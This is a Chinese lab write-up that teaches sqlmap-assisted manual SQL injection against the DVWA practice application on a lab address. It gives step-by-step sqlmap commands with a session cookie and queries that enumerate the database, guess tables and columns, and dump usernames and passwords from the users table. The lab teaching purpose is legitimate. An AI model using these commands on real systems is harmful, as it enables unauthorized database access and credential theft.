【合天网安】利用sqlmap辅助手工注入

实验背景：

SQLmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定URL的SQL注入漏洞，内置了很多绕过插件，支持的数据库是MySQL、、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite 、Firebird、Sybase和SAP MaxDB。SQL Map采用了以下5种独特的SQL注入技术。

基于布尔型的盲注，即可以根据页面返回页面判断条件真假的注入。
基于时间的盲注，即不能根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语句是否已执行（即页面返回时间是否增加）来判断。
基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中
联合查询注入，在可以使用Union的情况下的注入
堆查询注入，可以同时执行多条语句时的注入

SQLMap强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标、文件系统、并在获取完全的操作权限时实行任意命令。SQLMap的功能强大到让人惊叹，当常规的注入工具不能利用SQL注入漏洞进行注入时，使用SQLMap会有意想不到的效果。

实验目的：

通过该实验熟悉sqlmap常用命令，利用sqlmap辅助手工注入。

实验过程：

1)进入DVWA

2)找到并打开SQL Injection ,提交1，打开burpsuite抓包，然后点击submit，获取cookie值

3)使用内置函数获取用户名，版本，数据库名等信息

输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "select user(),version(),database()"

4）得到数据库名为dvwa，接下来猜表

输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(*) from dvwa.users)>0"

5）返回1，说明存在users表，然后开始猜列

输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(username) from dvwa.users)>=0"

6）第五步显示没有返回，说明不存在username列，将username改为user，返回1.

输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(user) from dvwa.users)>=0"

7）输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(password) from dvwa.users)>=0"

8）最后我们来猜解其列的内容，输入：

sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "select user,password from dvwa.users"

（如有不足或者侵权的地方，请尽快联系我，我会及时修改或删除，非常感谢）

机遇就像晨光，稍纵即逝。把握好机会，利用好时间，去追求更好的自己！